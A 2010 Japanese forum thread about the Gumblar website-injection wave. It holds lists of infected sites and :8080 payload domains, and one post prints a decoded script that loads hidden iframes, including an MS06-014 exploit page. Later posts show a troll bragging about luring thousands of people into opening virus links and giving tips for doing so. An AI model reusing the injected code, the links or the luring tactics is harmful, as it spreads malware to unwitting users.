それに、AV-TEST.orgとか、AV Comparativesのレポートは裏でお金の取引をして順位を上げてるなんて噂もあるし(嘘だと思うけど
どっちを信用すれば良いのかな?
ここのスレには毎度お世話になってるから、今回も書き込んでみました。宜しければご回答お願いします
>>143 そんなもんに神経使う前に日頃からの対策に神経を使ってください
145 :
143 :2010/03/14(日) 18:38:00
>>144 大丈夫既に各ソフトウェアのアップデートもしてるし、Firefox+Noscript+RequestPolicyでリダイレクトを防止して、AdblockPlusで8080ドメインをブロックしてる
>>143 サイト改竄に対してセキュリティソフト依存は危険。
極端な話、穴をしっかり塞いでおけばノーガードでも感染しない。
147 :
143 :2010/03/14(日) 18:46:21
>>146 あーそういえば穴を塞いでおけば大丈夫だったね。基本を忘れてた
セキュリティソフト依存が危険な事はわかってる。
だけど、ゼロデイ状態とかになったときの為とか、ガンブラー以外のウィルスに対しても広く対応させる為とかで、補助的な意味でウィルス対策ソフトの乗り換えを考えてる
3行目なら完全にスレチ
ソースの最後の方に function〜ゴチャゴチャ書いてたら
すべてアウトでいいの?
.
>>5 で 反応しないんだけど
どうやったらそんな発想ができるんだろう……
> 反応しないんだけど 無害だろw
トレンドマイクロだと Possible_Gumb-3 と 反応したから 確かめてみたかった
>>147 ゼロデイならほとんどの場合セキュソフトのヒューリスティックに引っかかるかどうかだから
下手すると乗り換え前のソフトだと検出したが乗り換え後のソフトだとスルーと言うこともありえるぞ
>>147 ある程度わかってる人なら乗り換えても問題はないと思うけど
そうじゃない人には慣れてるの使っとけといってる
実際そこまで大差ないし
今変えたとして直後にそれが調子悪くなったらまた変えるの?
毎回なんかあるごとに乗り換えてたらキリがなくね?
115です。2ちゃんネラーって、ガヤガヤとうるさいだけで全く当てになりませんね。 ろくなレスが付かないので同じ質問をOKEaveに書き込んだら、たちどころに適切な 役立つ投稿が何通もはいりました。
OKWaveなら知ってるお^^
どう見てもなりすましなのにいちいち釣られるなよ・・・
>>153 あーそっかwヒューリスティックになるんだよなw
確かノートンとマカフィーは・・・微妙だったような
前入れてたのはAntiVirとMSEだったからなかなかの性能だったよなー
親がノートン使ってて、3台までインストール可能ってなってたからさっき入れてみたけど、調べてみたらオンデマンドもヒューリスティックもAntiVirよりも下だったな@AVComparatives
>>154 大差ないのか・・・orz
確かにキリないなぁ。どうしよう
使い慣れてるのかー。だったらフリーのになるのかなぁ
確かに、ずべてのウィルスを検出できる製品なんてないし、ウィルスも日々大量生産されてるわけだし、AV-TESTとかはあくまで一例であって、実際はそんなに大差ないのかもしれないな
とりあえずテスト機関のレポートにあまりとらわれず、よく考えてみる事にする。答えてくれた人、ありがとうございます。
160 :
143 :2010/03/14(日) 21:37:21
連レススマソ。↑は143です
もうええっちゅーねん どんだけ語るんだよ
>>149 埋め込みに失敗(?)とかコメントアウトされてるとかで
実際には機能してないのもある
NoScript使えよ
おことわりします
下火になってきたみたいだな
>>142 orz
ic-isweb●hp●infoseek●co●jp/
isay●livedoor●biz/ ←!
<!--トロイを絶賛配布中!(無料)-->
www●plci●net/egf/
<!--更新履歴(不要の場合はここから削除)-->
<div class="module-archives module">
<div class="module-header"
<script>var (以下略
・・・コードは必要なんでしょうカネ?
嫌な無料配布だな
ヒマそうな冗談者は 腕試しにフランスドメイン(fr)洗ってみてくれ
genom氏のサイトには特定の個人や団体の情報なんて書かれてないだろ。 何でわざわざモザイクなんてかけるんだ?
その読み間違いは初めて見た
avast!スレより www●ebookjapan●jp/ebj/title/10429.html
>>170 それ、スクリプトが埋まってるって意味で言ってる?
>>174 ずいぶんアレな仕込み方だが・・・
//w●robints●us/us●js
↓
//w●robints●us/cnzz●html
//w●robints●us/614●html
//w●robints●us/jf●html
//w●robints●us/jg●html
この先はシラネ
178 :
名無しさん@お腹いっぱい。 :2010/03/16(火) 07:11:05
※4発装填中
http://w ●robints.us/us.js
4発の内訳
try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");
if (document.cookie!='__m'){
document.cookie='__m;expires='+(new Date(((new Date()).getTime()+600000)).toGMTString())+';';
document.write("<iframe src=
http://w ●robints.us/cnzz.html width=0 height=0></iframe>");
document.write("<iframe src=
http://w ●robints.us/614.html width=0 height=0></iframe>");
document.write("<iframe src=
http://w ●robints.us/jf.html width=0 height=0></iframe>");
document.write("<iframe src=
http://w ●robints.us/jg.html width=0 height=0></iframe>");
}}
飛ばされる先は
<iframe src=hXXp://w●robints●us/cnzz●html width=0 height=0>
</iframe>
↓
<div style=display:none>
<script src="hXXp://s10●cnzz●com/stat●php?id=1990191&web_id=1990191" language="JavaScript">
</script>
</div>
マイクロソフトのデータから総計としては少ないがこの御時世に未だMS06-014エクスプロイト。614.html
ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png 自国で撒くと足がつきやすいから他国に撒く
どうせ撒くなら足がつきにくい国はどこか?
答え.ウイルス黒人街中国ロシア
でもどうして未だにMS06-014なのか?614.html
e-bookjapan、凸ってみた。 ツイッターのアカウントあるけど、こっちも凸ってみる?
もう埋め込みの方は更新しないのかな。 毎週更新されて楽しかったのに。
e-bookjapan対応速かった。 マトモなとこだとホッとするな。
凸乙 メンテになってるな
「おいくつですか?」 「キャー痴漢!」 なんてリスク背負いたくないしな
いつの間にかflashplayerが手動DL出来なくなっているんだが 最新版を直DLできるURLとかないですかね?(以前は、ここをクリックで手動DL可能だった)
>>187 ありがとう
しかし・・少し前までは通常ページからダウンロードを選択→ブラウザのブロック機能で
インストーラの発動を止める→ここをクリックで手動DLが可能だったのに何というせこさ・・
OperaやChromeならオフラインインストーラが落ちてきたはず…
ebookjapan復帰した。
「ウイルス感染確認のお願い」のページで、なぜアバスト!を勧めてるのかは不明だけど。
>>184 トップページではちゃんと「ウイルス感染の連絡があった」と記述されてた。
サブページはメンテって記述。
マトモな対応だ。これが普通だよな。
なんかこのスレで初めてマトモな対応をしたサイトを見た気がする アバスト!は無料だし今回genoウィルスにまじめに取り組んでる少ないウィルス対策ソフトだからじゃないかなと推測
あ、そうそう、忘れてた。 puremis●net/ mrtb●puremis●net/ jmt●puremis●net/ 随分ほったらかしにしてるみたい。
アクセス注意って言うぐらいなら.を●に変えろよ それともアレかあえてひっかける釣りか?
芸能人ブログID・パス流出、ホリプロ元社員逮捕
http://www.yomiuri.co.jp/national/news/20100317-OYT1T00021.htm インターネット広告会社「サイバーエージェント」(東京都渋谷区)が運営するブログサイト「アメーバブログ(アメブロ)」を
利用していた芸能人のIDとパスワードがネット上に流出した事件で、警視庁が、大手芸能事務所「ホリプロ」(目黒区)
元契約社員岡田邦彦容疑者(30)を不正アクセス禁止法違反の疑いで逮捕していたことがわかった。
逮捕は3月13日。
捜査関係者によると、岡田容疑者は今年1月1日未明、タレントの藤本美貴さんのブログに、藤本さんのIDとパスワードを
使って不正に侵入し、芸能人445人分のIDとパスワードなどが記載された個人情報リストを張り付けた疑い。その結果、
リストは藤本さんのブログを閲覧した人がクリックすると、ダウンロードできるようになっていた。
このリストはサイバー社の内部文書。同社社員が日頃から仕事上の付き合いのあった岡田容疑者に誤ってメールしたのが原因だった。
アメブロは日記形式のホームページ。サイバー社によると、事件後、リストの芸能人らのパスワードは変更されており、流出による被害は確認されていない。
(2010年3月17日03時03分 読売新聞)
>>197 ホリプロの元社員も悪いけどメールで送ったサイバーの社員も罰せられるべきだよな
スレチ
ID分かれば後は力押し ゲイツは本当に便利なチートマシンを作ってくれたぜ
>>197 パスワード送られてきたらログインしたくなっちゃうかもな
俺もミキティのパスが送られてきたらログインしちゃったかもしれん
でもリストをブログに貼り付けることはしないわな
あぁ、そのリスト、おれもブログみたらダウソされてきたので持ってるわ すげーいい加減なexcel管理だなぁと思った もっときれいに管理してやれよ あと、芸能人なのに自分の誕生日パスワードにするのはやめろ 公開されてるのに無用心すぎるだろw
顧客の個人情報を暗号化もせずにメールで送る非常識なクソ企業 日常的にずさんな管理しているんだろう。
釣りだろうけど 実験モルモットな組み合わせだなw
avastとmseを併用する価値が見出せない 併用は監視の重複で権利の奪い合いになってスルーが起きやすくなるからかえって性能が落ちる いろんなとこにコピペしまくってるとこ見ると被害者を増やしたいのかね
>>204 avast!++gred AntiVirus
MSE+gred AntiVirus
こうだろ?
Avira+avast!(4.8のwebシールドのみ)+comodo+SpyBot(免疫化のみ) この組み合わせは良いぞ
avast!+MSE(avastの検疫ファイルを除外指定)で無問題。
トリプルエンジン(笑)
>>2 以上の対策は自己満足だから好きにすればいいけど、ウザいからいちいち宣伝しないでね。
ちっ、うるせーな
いやあ彼ももう忘れ去られた存在だねえ
ルナスケープってなにそれ食えんの?
Adobe Readerをアンインスコして、他社製のPDF読み込みソフトを導入するのはGumbler対策になる?ならない?
ここで断言できる人はいないので作ってる人にきいてください
>>216 Gumblar対策だけならReaderのままでもブラウザから自動起動されないようにすればいいだけだろ
クチチ
217じゃないが…
>>216 に回答すりゃ、それは断言になるだろ
なに?よくわからないあいまいな答えが欲しかったの?
だってそりゃお前、日本人だもの。 「どちらともいえない」が一番しっくりくるに決まってるべ。
また変化する可能性もあるのに大丈夫とはいえないだろ
Adobe Readerだって最新版使えばいいだけ 前のバージョンだってJavaScript無効にすればいいだけ 他社製にする必要もない
ただアドビ製品は今までMS以上の放置プレイで脆弱性修正を怠ってたから 最新版だろうがJavaScriptオフだろうがまだまだ山ほど脆弱性が残ってそうなのが怖いんだよな
>>192 403になっとるな。本に紹介されたばっかりなのにね。
これ、お詫び無しパターンだぜ。
>>225 s1●shard●jp/dreaming/
電凸完了
>>225 www●avis●ne●jp/~muranaka/
電凸完了
>>225 www●hct●zaq●ne●jp/cpacs503/
電凸完了
あとは明日以降
>>225 挿入した不要な文字を函数で削除するタイプ
主要部はこれまでの応用だけど…
BuyTheBlenderma●ru:8080
404 Not Found
404 Not Found
YourSuperPool●ru:8080
SuperSuperMall●ru:8080
TheBlenderTutorial●ru:8080
TheBlenderTutorial●ru:8080
YourSuperPool●ru:8080
ExcellentBlender●ru:8080
どれもドメイン名に大文字が入ってるんだけど、
ひょっとして、これだけで検出できなくなるとか?
>> 232 これも大文字入り SuperSuperMall●ru TheBlenderTv●ru BuyTheBlender●ru YourSuperPool●ru > スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった どれも、この5 IPのラウンドロピンですね 91●121●7●26 91●121●24●139 91●121●134●58 91●121●137●124 91●121●163●215
電凸とか男前過ぎる。
route: 91.121.0.0/16 descr: OVH ISP descr: Paris, France origin: AS16276 ここに電凸できれば、超男前だな
237 :
名無しさん@お腹いっぱい。 :2010/03/19(金) 10:14:01
www●kikuyakikai●com 感染している事を知っているにもかかわらず放置 電話しても担当者はいない、ここは会社ではなく個人の家 などと訳のわからない対応を行い、会社としての責任を果たしていない。
googleから客来ないから潰れますよ、って言えばいい
>>229 修復したけど感染告知無し。
こういう宿は泊まっても不快な思いをするだけだろうな。
改竄されすぎw //www●aquaview●jp/q_a/index●html
//www●kanone●jp/
俺がアクセスしたページに限って改竄されてて笑いました
>>232 とかのVTで検出成功してるアンチウイルスって何?
avast、AVG、カスペ、ノートン、G-DATA辺り?
>>237 確認の為に電凸してみました。ワロタww
GMOインターネット株式会社に凸。。
んで、完了。
>>206 亀レスで申し訳ない
それって、そもそもスルーされて監視が出来ないってことだよね?
例えば3つアンチウィルスを入れてたとしてそのうち一つでしか検出出来ないウィルスだとする
その唯一検出できる製品がスルーして、取りこぼすっていう可能性もある?
検出のされにくさとか関係ないんだよね?
>>225 www●i-paradise5●jp/~simple/otona/index●php → 電話が繋がらないのでパス
www●kadoma-c●com → 上流に凸、既に別の有志より連絡が有ったとの事
www●kikuyakikai●com →
>>244 www●sesica●co●jp → 上流に凸完了
一休み
>>245 AvastとMSEの組み合わせで起きるかは知らんが
昔流行ったセキュリティブログで紹介された
Avast(常駐ガードオフでシールドはオン)+AntiVirでダブルエンジン()というやつでは
検出できずにスルーしたという話があった気がする
249 :
名無しさん@お腹いっぱい。 :2010/03/20(土) 12:26:24
twentyfour-24●com
250 :
名無しさん@お腹いっぱい。 :2010/03/20(土) 12:36:22
www●jde-net●co●jp ここも電話してもやる気のない対応 これが社長なんだから笑う
おまいらこんなにどうやって見つけるの?
252 :
名無しさん@お腹いっぱい。 :2010/03/20(土) 12:47:20
www●jc-consulting●jp www●e-kudamono●co●jp
253 :
名無しさん@お腹いっぱい。 :2010/03/20(土) 13:30:14
www●pflaster●jp/2009/12/
we-rank●com/modules/bulletin1/rss●php kallook●com www●trajal●net/PR/index●html -- www●bestofunder●com ←(笑)
>>256 レン鯖じゃないよ。
誰かろりぽ通報頼んだ
>>256 まじだwww
全部にこのサイトはコンピューターに(ry
SEOばっかりだ
umai●kitcut●org/omegatukau/ 定番xrea
全部感染してたらSEOも糞も無いという。 Google先生もいっそのこと検索結果から消してしまえばいいのに。
素人だからよくわからんが、オーキタ家具とかいう家具屋さんのHP見てたら、 ウイルスバスターさんから感染の警告きた・・・ もしかしてそのサイトウイルスばらまいてる?
264 :
名無しさん@お腹いっぱい。 :2010/03/20(土) 21:58:31
やっぱり・・・
オーキタ家具(絶賛放流中) www●o-kitakagu●jp/
>>266 Lynxで問い合わせフォームからつーほーした。
common/js/base.js も ぁぅぁぅぁー
一向に下火にならんな アホは、ウィルスサイトばらまいてるし バカは、感染してると教えても再改ざんされるし ここの人達の努力は、偉いよ
自分のPCが感染してるかどうかを簡単に調べる方法ありますか? スタートアップにsiszyd32.exeとTMD.tmpがいなくてregedit.exeが起動できれば 感染してないってことになりますか?
スレの前の方に何か書いてあるぞ
273 :
名無しさん@お腹いっぱい。 :2010/03/21(日) 10:00:40
nagoya●cool●ne●jp/yukaridazou
sandia●co●jp www●hdta●jp www●jc-consulting●jp/ 閉鎖してもトロイの配布は止めないらしい・・・ www●daini-survey●com/ >誠に申し訳ありません。 >都合により、当ホームページを一時閉鎖させていただきます。 >これまで、当ホームページへアクセスいただき、有難うございました。 <<!-- \(^o^)/オワタ -->
276 :
263 :2010/03/21(日) 12:15:52
263の素人なんですが、どうやら踏んでしまったので対策について教えてほしいです。FTPパスワードの変更ってのは具体的に何をしたらいいですか? とりあえず、踏んでしまったので、しばらくオフラインで使用して、その後リカバリーしようかなっと思ってます。 OSが入っていないドライブもフォーマットしないとだめなんですかね? あと踏んだ時のPCの状態を書いておきます。 ウイルスバスターから警告くる→いつの間にかウイルスが隔離されてる(時間情報からオーキタ家具HPと判断)→総合検索(クッキーしかひっかからず) →シマンテックさん・マカフィーさんの無料検索サービスでもひっかからず→とりあえずここに報告→現状 環境:Windows7 Ultimate (Updata最新版) アドビリーダーUPDATAがあったが、言語サービスだったので、おそらく関係なし FLASHPLAYER:最新版 IE8:初期設定のまま 普通に侵入されました(泣)
釣り乙
はいはいフォーマットフォーマット
>>276 マジレスするとftpパスはウェブサイトをftpで管理してる人以外には関係ない
最低限システムドライブのフォーマットは必要だが
システム以外のドライブにウイルスのコピーが残ってないとは言えない
心配ならすべてのドライブをフォーマットするのが確実
280 :
263 :2010/03/21(日) 13:19:21
>>279 なるほど、そういうことなんですね・・・ありがとう。
というかバスターが止めてくれたんなら問題ないでしょ
282 :
名無しさん@お腹いっぱい。 :2010/03/21(日) 13:44:27
改竄?
http://www ●ibs-ishii-sports●co●jp/
全部消されてるのだが。
でもウイルスバスター入れてたら感染しないよ? なんといっても販売本数No1だからね
>>276 ウイルスバスターが警告している時点で防いでるんじゃないか
脆弱性の対策もしているようだし感染はしていないだろ
>>276 >FLASHPLAYER:最新版
バージョンはちゃんと書こうね。「10.0.45.2」とか。
ani-an●co●jp/ posh-e●com/index3●htm minatomo●jp/ dxenglish●value-net●net allgolf●web●fc2●com/a21 ←! www●granship●com/index●html
287 :
名無しさん@お腹いっぱい。 :2010/03/21(日) 19:09:02
hamu22●hp●infoseek●co●jp jumpfine●com/hiesyo1/ www●clca●or●jp/club/ ←再感染 www●slowstylegym●com
ちょっくら出張して あらゆるスレで踏ませてきたぜb (>w<)b俺GJ! (VдV)ノシ AIONスレのみんなー♪みてるー♪
↑これ犯罪じゃね?
>>289 (VДV)え!?
(VдV)お前犯罪者なの?これってお前のことだよな
まだまだ頑張るお 地雷マスターだおヽ(VдV)ノ今日だけで5000人以上に踏ませたお!
>>291 素直に感動。
そこまで出来る勇気が欲しい。
ん?快楽殺人と同じような考え?
取り敢えず影ながら応援。
うーん しかし前にブログでまとめた内容だと我ながらわかり難い内容になってるな (V`д´V)よし、こりゃ近々また更新すっか! 今度スティッカムとかでウィルス踏ませる実況配信とかしてみよかな
>>293 いや踏ませたぐらいで犯罪にならないのは知ってるがwww
ただそれをする行為は快楽殺人と同じなのでは・・・と思っただけ。
俺は踏ませようとするだけで無理。
ブログは拝見させて貰ってる。
何故か惹かれる。
殺人はおおげさだべ まぁPC命な連中からしたら殺人的なのかもな 俺の影響でPC初期化しちまった奴に見つけ出して殺してやると言われたことも多々ある。 (VдV)俺様としてはただのゲーム感覚 踏ませる立場の心理は大体似たようなもんだろ 踏む奴は馬鹿、平和ボケ乙、ざまぁって感じだな
宣伝乙
何が俺様だよ。
<(V`д´V)>俺様えっへん!
>>296 それは「殺す」って言った方が悪い。それは殺人予告だな。
それに常時ソフト(常識)付けずに安易に踏む香具師が悪い。
このガンブラーのご時世でさwwwww
俺も踏ませようかな・・・
一応そういうの好きな方。
(VдV)ノ いいぞいいぞ!やっちゃえやっちゃえ!地雷デビューだー! ちゃんと報告しろよ>w<踏ませるのもっと流行れ!
<(V`д´V)>そしてまたエッヘン! / \
狙い目とかねーよ 適当に行き当たりばったりで楽しめばいいさ ただ過疎過ぎるとこだと言うまでもなく反応がなくて駄目 貼ってすぐに↑ウィルスだから踏むな! って書かれた場合は次へ移行すればいい 自演で誘導するのもいいし。 そうだ最初はIDのないスレでやってみれば良い('д')
キモイのが粘着し始めたか このスレももう終わりだな
>>307 うむ、お前も低脳だな
ウィルスURLが晒されてるスレをこの俺様こと、顔文字が見てるのは至極自然なことだお
( ´,дゝ`)少し考えればわかることでは〜?ボホホホホホwww
結局のとこ 俺様がゲーム感覚で行っていることも 常人にとってはとても難しいことだったりするわけか てことはつまり・・・・ <(V`д´V)>またエッヘン!ってなるお! / \
>>308 一つのスレだけじゃ分からないよ
もっと詳しく教えてよ
なにその低脳のワンパターンな発想 俺様に言われたことへ反論できず、仕方なくワンパターンな流れに逃げているのだな ならこっちも目には目をワンパターンには・・・ <(V`д´V)>エッヘンパターンだお!!!! / \
>>311 お前煽り方が下手糞杉
この手のコテにそういう煽りは逆効果
余計調子に乗るだけ
>>312 質問系でやった。
結構楽しいコレwwww
>>313 <(V`д´V)>な、なにーーーーー俺が調子に乗っているだとおおお?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
>>314 <(´VдV`)>やってきたスレを貼らないとな?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
>>313 すまんかった。しかし春だからかな・・・・
>>317 <(´VДV`)>ブワーッハッハッハッハ!!負け犬ザマァアア死ぬがよい!!!
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
意味がわからない
>>318 (VдV)は?
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな
( ´,дゝ`)=3 お前もう不合格だお
>>321 すまなかった・・・
そういう意味か・・・
分からなかった俺が悪いな。
一人でやるよ。
アドバイス有り難う。
ブログは読み続けるよ・・・
(VДV)おうよ!!!! (VдV) VдV) дV) 'д') д') ') ) 三VдV)ノシ
Дブワハハハハハ!! ガンブラー最高だわ! 今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ いつもならウィルスでしたー>w<駆除ガンバ! って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお>w<どうなることやらw
genoの違約金っていくら払うの?商品を返品したいんだけど
8080系のオペラで踏んじゃったけどJRE入れて無かったら感染しない?
VB2010が何も反応しなかったけど、そういうウィルスなの?
url貼ってみ
ζ / ̄ ̄ ̄ ̄\ / \ /\ \ / | ||||||| (・) (・) | (6-------◯⌒つ | < バカモ〜ン! また直リンしおって! | _||||||||| | \ / \_/ / \____/
>>330 8080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど
>>331 申し訳ない
>>332 特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね?
>>335 わざわざすいません。
早速実施します。
>>336 いまからじゃ無駄
OS、ドライブフォーマットせい
>>330 >>336 (VДV)ブウァハハッハハハッハハハハッハッハ!!!!!ザッマァアアア!!!!ヒャーッハー!
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな>w<
そういう悔しそうな書き込みを見てしまうとますます俺様がヽ(VДV)ノ 喜んでしまうではないか!!!!
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑
(VДV)ザッマァッァアァァアアみろ!死ねっ!!!お前のようなゴミはPCと一緒に焼却されてこいお(>w<)
おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ?(>w<)そのくらい頭に血が上っているのでは〜?W
(*VдV*)あーウケタw (*VдV*)まさか俺様にPC壊された低脳が来るとは・・・ ・・・思ってたよ!!!!!(>w<)!!!!! (VдV)今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな
(VдV)そしてその間、俺様はというと 買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW (V`д´V)な、わかったろ 正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。
(VдV)ここでURL鑑定したり URLまとめてる連中も同罪だな。 むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。 なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(>w<) (VдV)え?どこって?さぁ〜(笑) そうだ、これ勇気スレにもマルチしとこっと
>341 pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp
>>343 串だろそれ。
串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね?
346 :
343 :2010/03/22(月) 15:13:14
なんかすげーのが沸いてる
ローカルあぼ〜んも出来ないのかね、お前等
串サイトも危ないのかなあ
一般サイトも危ないのに串サイトなんて・・・
>>351 規制に巻き込まれた時にちょっと使うだけ・・・
>>352 代行レススレでいいじゃない
もしくは漫喫
●買えばいいよ
ζ / ̄ ̄ ̄ ̄\ / \ /\ \ / | ||||||| (・) (・) | (6-------◯⌒つ | < バカモ〜ン! また直リンしおって! | _||||||||| | \ / \_/ / \____/
ζ / ̄ ̄ ̄ ̄\ / \ /\ \ / | ||||||| (・) (・) | (6-------◯⌒つ | < バカモ〜ン! わしのAAを壊しおって! | _||||||||| | \ / \_/ / \____/
直リンしたのはあちこちでウィルス踏ませてる顔文字さんのためでもあるのです 誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね じゃんじゃん感染してけばいいとおもうにだ
>>359 ↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるw
犯罪者の弁 「こんなことで捕まるとは思ってなかった」
こんなアホでも捕まってくれると良いけどね
轢かれるとかで半身不随になってPCさわれなくなるのが望ましい。 もちろん貰いの貧乏事故で。
いまさらだが
>>263 ってwindows7のultimateなのに、
DEP切って、applockerも使ってないの?
ultimateいらねぇじゃん
home にしてしまえw
Java Runtime Environment なんて
>>3 見て初めて知ったんですけど
これって皆さんやはりインストールしているのでしょうか・・・?
>>3 の(1)〜(3)までは実行してあったのですが もしかしたらこの状態だと覗いただけで感染してしまってたのでしょうか?
てんぷらよみなおせ
249-253まで凸完了
www●e-kudamono●co●jp/ googlでは引っかからないけどaguseではTrojan-Clicker.JS.Agent.mz
ウイルス作成は儲かるとか、ガンブラーを作ったチームは、一人一千万貰ったとかですが それでも、一年に一回か二回は仕事をする必要があるんじゃないのかなー、と思うのです。 去年は、3月、10月、12月かな? 感染者がゼロからのスタートでご存知の通りの事態です。 次回は、残存感染サイト数、残存感染PC数から 更に鼠算式に拡大するのでしょうか。 ウイルスも差し替えられるのでしょうか。 出来れば、残存感染サイト数、残存感染PC数をゼロに近づけたいのですが いろいろと限界があるのです。。。
文章書いてみたけど、書くことは何も無かった って感じですね
勘違いもひどいし何が言いたいのか分からない すごい文章だ
374 :
名無しさん@お腹いっぱい。 :2010/03/23(火) 20:16:39
このスレも荒れてきたな・・・ 所でこれもガンブラーだよな? eroquis●s1●freexy●net/
377 :
名無しさん@お腹いっぱい。 :2010/03/23(火) 22:37:49
378 :
名無しさん@お腹いっぱい。 :2010/03/23(火) 22:53:36
aisyw●com
>>377 >ただいま移転作業中につき閉鎖しています
>近日中にこのページも削除されますので、ご了承下さい
んで
>>367 >>377 今は、改竄に気が付いて対応した後でコードはないが
>>347 が発見した時にコードは有ったのかも知れない
>>367 からもにコードは有ったのは確か
目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw
> 目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw
「
>>367 」をいちいち「
>>376 」と読み替えなきゃならないのもやっぱその類ですか?
>374 っていうか俺そのサイトよく訪れてたんですけど・・・ 仮にgumblarに感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事もありえるのでしょうか? その場合感染しているかどうか調べる方法はないのでしょうか?心配になってきた・・
とうとう警視庁が動き出したようだな むしろ遅すぎたが
とりあえずWindowsやアドビとかの脆弱性を全部埋めてセキュリティソフトを常に最新に保ち 常駐ソフト以外にもスパイボットとか入れてruとかのドメイン全部弾いて Webブラウザ等を仮想化する こんなもん? 出来ればCドライブ自体仮想化してしまえば何の心配もないんだろうけどな
スレチすまん。 ガンブラー系ではないかもしれないが、「igqjj.exe」ってのにやられてしまい今駆除中。 ググッても英文のサイトしか無く、情報少。誰か駆除できた方いませんか? その英文のサイトにあった「Superなんとか」って言うソフトで駆除しているけど、どこを見てもそのソフトしか出てこない。 新種なのか? で、感染源はどうやら「チュートリアルDVDの断片」らしい。英語で解説している(DL物)物だが、「まあ雰囲気で解るだろう」と 空けたのが間違いでそれに仕掛けてあったのか、乗ってきたのか定かではない。が、そのDL物ファイルを開けただけでは 見られないもので、アドレスやら何やら登録しないと始まらない仕様。 適当に架空の個人情報を入力し「サブミット」。たしかに映像は始まったが15分もしないうちにPCの挙動がおかしくなり CORE2 が「フリーズ」。初めてフリーズしたところを このマシンでみた。 うかつだった。 情報ありましたら、よろしくお願いします。重ねてスレチ、すみません。
>>386 スレチだと思うなら該当スレ探せよ
セキュ板に辿りつけたならわかるだろ
そもそも後半は何言ってるかわからん
>DL物ファイルを開けただけでは見られないもので、アドレスやら何やら登録しないと始まらない 例の暴露ウィルスと似てるなw
ホームページもってないひとは感染しても気がつきにくいかもな
>>390 そうそう
っていうか現時点での確認方法は各アンチウイルスソフトによるスキャンしかないのかな?
検出しない所が多いみたいだけどさ
感染したら色々ぶち込まれるみたいだから大元の本体は無理でも何かしら拾えないのか?>スキャン
偽セキュリティソフトが落とされたりすれば嫌でもわかるな
394 :
名無しさん@お腹いっぱい。 :2010/03/25(木) 20:31:30
397 :
名無しさん@お腹いっぱい。 :2010/03/25(木) 21:51:54
www●doomkeikaku●co●jp 株式会社レジナのホスティングが多すぎ
/.sys/?action= っつーコードが複数サイトでインジェクションされてるってとあるサイトで見たんだが どういうこったい
8080は強姦してくれるからわかりやすい xは気がつかない人は一生気がつかないかも
8080はxmlrpc.phpにもつくのか…
【陥落サイトのURL悪用厳禁】 www●net-fukui●jp www●doomkeikaku●co●jp/ seo●19th●org/ www●commentsexy●com/ ←ハニートラップwww 現在の最新型は ("repl"+"XXXace".substr(Y)) これが含んでるっぽい
>>401 1番目と3番目の文法ミスってどうしておこるの?
>>402 作者に聞いてみないとわからないのでござる
405 :
404 :2010/03/26(金) 14:20:34
【陥落サイトのURL悪用厳禁】 www●sankiblast●co●jp/ ←新型きたー 現在、発掘作業中・・・
【陥落サイトのURL悪用厳禁】 www●coaster-ya●com/ www●soul-wave●jp/MAME/ j-news●net/ discussanctuary●com/main●php ←! www●daini-survey●com/ www●daini-survey●com/xmlrpc●php ←! harappa-h●org/ harappa-h●org/AtoZ/modules/popnupblog/rss●php ←! ががが・・・
408 :
U.F.O ◆U.F.OnbYNA :2010/03/26(金) 18:20:00
>>407 これも新種なの・・・か?
jニュースが・・・
net-fukuiとdoomkeikaku 逃げるの早すぎてワロタwww
411 :
U.F.O ◆U.F.OnbYNA :2010/03/26(金) 18:37:49
>>410 よく覗いてたあのサイトも感染ったとは・・・
そのタグが新種か・・・
あとphpが多いけどドメイン範囲でphp感染してる?
最悪だな…もうどうにもならないんだね 1年も終息に向かわないなんて… 本当にこれの犯人は死刑では済まされないな 一日でも捕まる事を祈るしかないか… ここまで新種が出たりして ロシアンルーレット状態のネットなんかやりたくないよ…もう嫌だ
これじゃちょんぎって聖職者になるしかない
【陥落サイトのURL悪用厳禁】
j-news●net/だが・・・
include/external●js
/include/xoops●js
この2つもやられてた。
あと、デコード後のURLは
news-com-au●priceminister●com●timesonline-co-uk●TheSuperPager●ru:
8080
/5d6d●com/5d6d●com/rian●ru/homeway●com●cn/google●com●php
これで良いのかな?
>>411 陥落サイト=感染したPCの中の情報次第。
AVGにしていて良かったと思ったら感染しそうで怖い。 ってかスペインかどっかで捕まったウィルス作成グループは どうなったの?
Aviraは現物対応だからスクリプトでは無理。
なんだかんだで ru:8080/ もしくは :8080/ をURLブロックするのが一番楽?
:8080ごとブロックはやめとけ
>>416 あれは作者じゃなくてそれを買ってるユーザーだったような
